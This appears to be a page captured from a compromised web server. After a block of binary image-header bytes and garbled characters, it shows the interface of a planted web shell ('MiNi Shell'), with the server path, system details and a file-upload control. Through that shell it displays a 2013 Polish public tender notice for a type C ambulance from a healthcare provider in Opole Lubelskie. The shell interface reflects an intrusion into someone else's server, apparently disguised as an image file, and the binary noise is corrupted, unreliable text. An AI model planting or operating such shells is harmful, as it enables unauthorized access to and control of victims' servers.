JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130529/209830-N-2013.html

<p class="kh_header"><b>Opole Lubelskie: Ambulans typu C</b><br>
<b>Numer ogłoszenia: 209830 - 2013; data zamieszczenia: 29.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Przemysłowa 4a, 24-300 Opole Lubelskie, woj. lubelskie, tel. 81 8272278, faks 81 8272278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozopolelubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ambulans typu C.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Zakup (60 rat) i dostawa dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej Opolu Lubelskim ambulansu typu C-szt.1 
1. Przedmiot zamówienia obejmuje zakres:
Zakup (60 rat) fabrycznie nowego ambulansu typu C wraz z fabrycznie nowym wyposażeniem  oraz dokonanie przeszkolenia personelu z obsługi ambulansu typu C.
L.p.
Parametry wymagane
Wartość oczekiwana
1Nadwozie
2. Typu furgon z izolacją termiczną i akustyczną obejmującą ściany oraz sufit zapobiegająca skraplaniu się pary wodnej, Ściany i sufit wyłożone łatwo zmywalnymi tłoczonymi profilami lub płytami z tworzywa sztucznego. TAK
3. DMC do 3,5t  TAK
4. Częściowo przeszklony z możliwością ewakuacji pacjenta i personelu. TAK
5. Przystosowany do przewozu min. 4 osób w pozycji siedzącej oraz 1 osoby w pozycji leżącej na noszach.TAK
6. Kabina kierowcy dwuosobowa zapewniająca miejsce pracy kierowcy zgodnie z PN EN 1789. Fotele wyposażone w podłokietniki.TAK
7. Wysokość przedziału medycznego min 1,85 m. (podać oferowaną wartość).
TAK  PODAĆ
8. Długość przedziału medycznego min 3,25 m. (podać oferowaną wartość).
TAK  PODAĆ
9. Szerokość przedziału medycznego min 1,75 m. (podać oferowaną wartość).
TAK  PODAĆ
10. Drzwi tylne wysokie, przeszklone, otwierane na boki o min 260 stopni. (podać oferowaną wartość).TAK  PODAĆ
11. Drzwi boczne prawe przesuwane do tyłu z otwieraną szybą. TAK
12. Okna przedziału medycznego pokryte w 2/3 wysokości folią matującą. TAK
13. Uchwyt sufitowy dla pasażera przedziału kierowcy TAK
14. Częściowo przeszklona ścianka działowa oddzielająca kabinę kierowcy od przedziału medycznego wyposażona w drzwi przesuwne o wysokości min. 1800mm, umożliwiające poruszanie się pomiędzy pomieszczeniem medycznym a kabiną kierowcy na postoju. Konstrukcja i działanie drzwi  - zgodnie z wymogami normy PN EN 1789. 
TAK
15. Lakier w kolorze białym TAK
16. Dzielone wsteczne lusterka zewnętrzne elektrycznie podgrzewane i regulowane, wbudowane światła kierunkowskazów,TAK
17.Centralny zamek wszystkich drzwi sterowany pilotem.TAK
18. Autoalarm.TAK
19. Poduszka powietrzna dla kierowcy i pasażera, dwie poduszki boczne oraz dwie kurtyny powietrzne,TAK
20. Reflektory przeciwmgielne przednie,TAK
21. Elektrycznie otwierane szyby w kabinie kierowcy, TAK
22. Światła boczne pozycyjne,TAK
23. Możliwość elektronicznej regulacji prędkości obrotowej silnika na postoju w celu doładowania zespołu akumulatorów gdy ambulans nie jest w ruchu. Panel sterujący tą funkcja umieszczony w kokpicie kierowcy w łatwo dla niego dostępnym miejscu.
TAK
24.Czujniki parkowania przednie i tylne z wizualną sygnalizacją w lusterkach zewnętrznych z możliwością wyłączenia czujników przednich. Zamawiający nie dopuszcza rozwiązania z wyświetlaczem w kabinie kierowcy dla czujników tylnych pojazdu.TAK
25. Układ wydechowy fabrycznie przedłużony do końca pojazdu przystosowany do pełnienia funkcji samochodu specjalnego sanitarnegoTAK
26. Dodatkowe drzwi boczne usytuowane za kierowcą, za którymi znajduje się schowek na; butle tlenowe, krzesełko kardiologiczne, materac próżniowy, deskę ortopedyczną, nosze podbierakowe. Obserwacja manometrów butli musi odbywać się zarówno od wewnątrz jak i z zewnątrz. Dostęp do sprzętu znajdującego się w schowku tylko z zewnątrz pojazdu.TAK
27. Zbiornik paliwa o pojemności min. 100l. TAK
28. Aktualne dotyczące przedmiotu oferty świadectwo            homologacji na pojazd skompletowany - M1/pojazd     specjalny - karetka sanitarna (dostarczyć wraz z pojazdem)TAK
28. Potwierdzenie wykonanego testu zderzeniowego całego jednorodnego nadwozia ambulansu (zgodnie z wymogami PN EN 1789) wystawione przez niezależną notyfikowaną jednostkę badawczą - podać datę, numer protokołu oraz nazwę jednostki badawczej TAK  PODAĆ
29. Trójkąt ostrzegawczy - 1 szt., klucz do kół z podnośnikiem,
 szperacz bezprzewodowy akumulatorowy 12V,  TAK
31 Silnik 
32. Zasilany olejem napędowym z zapłonem samoczynnym, turbodoładowaniem, elastyczny, zapewniający przyspieszenie pozwalające na sprawną pracę w ruchu miejskim, o pojemności od 1800 do 1999cm3 (podać oferowaną wartość).
TAK  PODAĆ
33. Silnik o mocy min. 160 KM. (podać oferowaną wartość).
TAK  PODAĆ
34. Moment obrotowy min. 380 Nm. (podać oferowaną wartość).
TAK  PODAĆ
35. Norma emisji spalin Euro 5.TAK
36. Zainstalowana dodatkowa elektryczna grzałka zasilana z sieci 230V umożliwiająca ogrzanie silnika podczas postoju przy niskich temp. TAK
37. Miernik zużycia paliwa o parametrach:
zapewniający dobrą widoczność wyświetlacz kolorowy (min. 260 tys. kolorów - podać wartość oferowaną), dotykowy (typu touch screen) o wysokiej rozdzielności (min. 480x260 pixeli - podać wartość oferowaną), o wymiarach min. 50x90 mm (podać wartość oferowaną), umożliwiający regulację kontrastu (dzień/noc) 
podający wskazania: ogólnego zużycia paliwa, chwilowego zużycia paliwa, średniego zużycia paliwa, długości trasy, czasu jazdy, średniej prędkości, z możliwością zaprogramowania minimum ośmiu użytkowników (kierowców ambulansu) pojazdu (automatyczne wskazania ww. parametrów dla zalogowanego na danej zmianie kierowcy). zabezpieczenie kodem PIN,
sygnał akustyczny przekroczenia prędkości obrotowej (zwiększone zużycie paliwa)
możliwość zaprogramowania sygnalizacji optymalnego momentu zmiany biegów
możliwość transmisji danych z urządzenia do komputera osobistego (archiwizacja i analiza danych). TAK
38. Zespół napędowy
39. Skrzynia biegów manualna synchronizowana TAK
40. Min. 6-biegów do przodu i bieg wsteczny. TAK
41. Napęd na koła przednie lub tylne. TAK
42. System stabilizacji toru jazdy typu ESP,TAK
43. System zapobiegający poślizgowi kół osi napędzanej przy ruszaniu typu ASR,
TAK
44. System wspomagania ruszania pod górę typu AAS lub hill asystent lub równoważny TAK
45. Zawieszenie
46. Zawieszenie posiadające drążki stabilizacyjne obu osi. Zawieszenie przednie i tylne wzmocnione zapewniające odpowiedni komfort transportu pacjenta TAK
47.System hamulcowy
48. Ze wspomaganiem. TAK
49.Z systemem ABS zapobiegającym blokadzie kół podczas hamowania.TAK
50. Elektroniczny korektor siły hamowania TAK
51. Układ wspomagania nagłego hamowaniaTAK
52.Układ kierowniczy
53.Ze wspomaganiem. TAK
54. Kolumna kierownicy regulowana w dwóch płaszczyznachTAK
55.Wyposażenie pojazdu
56. Wszystkie miejsca siedzące wyposażone w bezwładnościowe pasy bezpieczeństwa i zagłówki.TAK
57. Kosz na śmieci.TAK
58. Dodatkowa gaśnica w przedziale medycznym.TAK
59. Urządzenie do wybijania szyb zintegrowane z nożem do cięcia pasów.TAK
60.Ogrzewanie i wentylacja - układ ogrzewania zgodny z PN EN 1789 ppkt. 4.5.5. oraz charakteryzujący się parametrami nie gorszymi jak poniższe
61. Ogrzewanie przedziału medycznego cieczą chłodzącą silnik - dodatkowa nagrzewnica wodna z zaworem odcinającym.TAK
62. Ogrzewanie postojowe - grzejnik elektryczny z sieci 230V z możliwością ustawienia temperatury i termostatem o mocy min. 1,8 kW.TAK
63. Niezależny od pracy silnika system ogrzewania kabiny kierowcy i przedziału medycznego z możliwością ustawienia temperatury termostatem (podać markę i model),  TAK  PODAĆ
64. Mechaniczna wentylacja nawiewno- wywiewna.TAK
65. Dwuparownikowa klimatyzacja przedziału sanitarnego i kabiny kierowcy. Z niezależną regulacją temperatury dla każdego przedziałuTAK
66. Otwierane okno dachowe (szyberdach) montowany w suficie nad wezgłowiem noszy  o wymiarach minimalnych 900x500mm pełniący jednocześnie funkcję wyjścia ewakuacyjnego (podać markę i model)
TAK  PODAĆ
67Instalacja elektryczna - instalacja elektryczna powinna być sporządzona w sposób zapewniający jej bezpieczne działanie zgodnie z PN EN 1789 - podpunkty od 4.3.2 do 4.3.4. i charakteryzować się nie gorszymi parametrami jak poniżej
68. Alternator zapewniający ładowanie zespołu 2 akumulatorów o mocy min. 2100 W.
TAK
69. Dwa akumulatory o łącznej pojemności min. 180 Ah do zasilania wszystkich odbiorników prądu.TAK
70. Automatyczna ładowarka akumulatorowa sterowana mikroprocesorem ładująca akumulatory prądem odpowiednim do poziomu rozładowania każdego z nich.TAK
71. Zasilanie zewnętrzne 230 V z min. 2 gniaz­dami wewnętrznymi z zabez­pie­czeniem uniemożliwiającym rozruch silnika przy podłączonym zasilaniu zewnętrznym i z zabezpieczeniem przeciwporażeniowym +przewód zasilający min 10 m.TAK
72. Min. 4 gniazda 12 V w przedziale me­dycznym typu Hella,TAK
73.Oznakowanie, oświetlenie, sygnalizacja dźwiękowa - w pojeździe powinien znajdować się układ ostrzegania zarówno optycznego, jak i akustycznego - zgodnie z przepisami ustawy Prawo o ruchu drogowym oraz powinien on charakteryzować się nie gorszymi parametrami jak poniżej
74.Belka świetlna umieszczona na przed­niej części dachu pojazdu z modułami LED koloru niebieskiego i dodatkowymi halogenowymi lub LED  światłami roboczymi do oświetlania przedpola ambulansu, wysokość belki max. 100 mm - (podać markę i model i wysokość belki). W komorze silnika lub pasie przednim zamontowany głośnik o mocy min. 100 W, sygnał dźwiękowy modulowany - zmiana modulacji przyciskiem klaksonu, możliwość podawania komunikatów głosowych.TAK  PODAĆ
75. Dodatkowe sygnały pneumatyczne (min. 2 trąby powietrzne) przystosowane do pracy ciągłej z własnym układem smarowania TAK
76. Dwie niebieskie lampy LED na wyso­kości pasa przedniego barwy niebieskiej. TAK
77. Belka świetlna umieszczona na tylnej części dachu pojazdu z modułami LED koloru niebieskiego i dodatkowymi halogenowymi lub LED światłami roboczymi do oświetlania przedpola za ambulansem - wysokość belki max. 100 mm - (podać markę i model i wysokość belki). TAK  PODAĆ
78. Światła awaryjne zamontowane na drzwiach tylnych włączające się po otwarciu drzwi. widoczne przy otwarciu o 90, 180 i 260 stopni TAK
79. Reflektory zewnętrzne z czterech stron pojazdu (łącznie z reflektorami w belkach sygnalizacyjnych) ze światłem rozproszonym typu LED do oświetlenia miejsca akcji, po dwa z każdej strony, z możliwością włączania ) wyłączania zarówno z kabiny kierowcy jak i z przedziału medycznego.TAK
80. Ambulans oznakowany trzema pasami odblaskowymi z folii: typu 3 barwy czerwonej o szerokości co najmniej 15 cm w obszarze pomiędzy linią okien i nadkolami, typu 1 lub 3 barwy czerwonej o szerokości co najmniej 15 cm, umieszczony wokół dachu oraz typu 1 lub 3 barwy niebieskiej umieszczonym bezpośrednio nad pasem czerwonym w obszarze pomiędzy linią okien i nadkolami. TAK
81. Z przodu pojazdu napis: lustrzane odbicie słowa AMBULANS.TAK
82. Oznaczenie typu karetki na bokach, drzwiach tylnych symbolem S w okręgu oraz symbolami Państwowego Ratownictwa Medycznego. Oznakowanie musi być zgodne z Rozporządzeniem Ministra Zdrowia z dnia 18.10.2010r. TAK
83. Oznaczenie właściciela karetki w formie przezroczystej naklejki z niebieskimi napisami. Miejsce uzgodnione z Zamawiającym po wyłonieniu Wykonawcy. TAK
84.Oświetlenie wewnętrzne przedziału medycznego - oświetlenie zapewniające prawidłową pracę personelu medycznego zgodne z PN EN 1789 ppkt. 4.5.6. oraz charakteryzujące się parametrami nie gorszymi jak poniżej
85.Światło rozproszone umieszczone po obu stronach górnej części przedziału medycznego min. 6 punktów świetlnych typu LED. TAK
86. Oświetlenie halogenowe lub LED regulowane umieszczone w suficie nad noszami punktowe (min. 2 szt.).TAK
87. Oświetlenie punktowe halogen lub LED blatu roboczegoTAK
88.Wyposażenie pomieszczenia dla pacjenta - pomieszczenie dla pacjenta powinno pomieścić urządzenia medyczne wyszczególnione w normie PN EN 1789 w tabelach od 9 do 19 dla ambulansu typu C, powinien on być zamontowany w sposób bezpieczny, uniemożliwiający uszkodzenie go lub zranienie osób w poruszającym się pojeździe
89. Na ścianie lewej przy przegrodzie szafka narożna        składająca się z wnęki na lekarstwa zamykanej roletą  oraz poniżej przelotowa szafka z możliwością wyjmowania ekwipunku do wnętrza przedziału medycznego z jednoczesnym dostępem z zewnątrz poprzez otwarte drzwi boczne oraz z blatem roboczym wykończonym blachą nierdzewną. Torby zabezpieczone obejmami)paskami przed przesunięciem. W zabudowie meblowej na ścianie lewej z przodu przedziału medycznego należy uwzględnić: 
           - szafkę/schowek tzw. aptekę (wyposażoną w jednolite półki    z przegrodami)  zamykany na klucz. W tej samej linii wnęki na pudełka rękawiczek jednorazowych zamykane drzwiczkami z plexi z otworami. Na ścianach bocznych z prawej i lewej strony zestawy półek (podświetlane diodami LED)-  z drzwiczkami otwieranymi/zamykanymi do góry, wykonanymi ze wzmocnionego, przezroczystego tworzywa, zabezpieczone przed niekontrolowanym wypadnięciem umieszczonych tam przedmiotów z zamkami typu ,,push,, Pod półkami po stronie lewej szufladki. Poniżej pod szyną Modura i uchwytem defibrylatora po stronie lewej bliżej tylnych drzwi zabudowany kosz na śmieci z uchylnym wlotem TAK
90.
2.       Na ścianie działowej szafka  z miejscem do zamocowania na dole walizki lub torby medycznej, z blatem roboczym posiadającym otwierany na docisk podręczny schowek na pojemnik odpadów niebezpiecznych oraz wysuwaną pod nim szufladą. Poniżej szuflada na jednorazowy sprzęt medyczny oraz wysuwany kosz na odpady.
           Na prawej ścianie przed tylnymi drzwiami pionowa szafa z wysuwaną szufladą oraz poniżej wnęka z plastikowymi przeźroczystymi pojemnikami na sprzęt jednorazowy drobny zasuwana roletą. TAK
91.
3.       Uchwyt do kroplówki na min. 4 szt. mocowane w suficie. TAK
92.
4.     Zabezpieczenie urządzeń oraz elementów wyposażenia przed przemieszczaniem się w czasie jazdy, gwarantujące jednocześnie łatwość dostępu i użycia.
TAK
93.
5.     Centralna instalacja tlenowa zamontowanym na ścianie lewej panelem z min. 2 punktami poboru typu AGA , manometrem ciśnienia w instalacji oraz przełącznikiem butla/butla (wybór butli z której ma być pobierany tlen); sufitowy punkt poboru tlenu z wężykiem i maseczką pacjenta, z regulacją przepływu tlenu  przez przepływomierz ścienny zamontowany obok fotela na ścianie prawej przedziału medycznego; uchwyt na 2 szt. butli tlenowych 10 litrowych w zewnętrznym schowku, 2 szt. butli tlenowej 10l z reduktorami. Centralna instalacja tlenowa z min. 3 punktami poboru typu AGA - gniazda o budowie monoblokowej panelowej, min. 1 przepływomierz obrotowy o przepływie od 0 do 15 litrów)min., wyposażony w nawilżacz tlenowy wykonany z tworzywa sztucznego, 2 szt. butli tlenowych 10 litrowych z reduktorami. (deklaracja zgodności CE na elementy instalacji tlenowej; punkty poboru gazu, przepływomierz, reduktory - załączyć do oferty) TAK
94.
6.       Centralna instalacja próżniowa:
- z regulacją siły ssania i manometrem podciśnienia
- słój z tworzywa sztucznego przystosowany do sterylizacji o poj. min 1L z zaworem antyprzelewowym , z możliwością szybkiego demontażu w celu wymiany, 
- przewód ssący silikonowy o długości min 1,5 m zakończony łącznikiem do cewników;
TAK.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.41.21-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy 
        prawa nakładają obowiązek ich posiadania;
- warunek ten zostanie spełniony jeżeli:
         a) wykonawca  złoży  pisemne oświadczenie o treści stanowiącej  Załącznik nr 2; 
         b) koncesję lub zezwolenie  na prowadzenie działalności gospodarczej w zakresie objętym 
              zamówieniem publicznym , do których w/w dokument jest wymagany przepisami prawa;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym do wykonania   
         zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują z osobami zdolnymi do wykonania   
         zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniajacej wykonanie zamówienia,
nie podlegają wykluczeniu z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spzozopolelubelskie.pl/index.php?option=com_docman&task=cat_view&gid=287&Itemid=115<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24-300 opole Lubelskie ul. Przemysłowa 4a, pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2013 godzina 13:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej, 24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok.nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com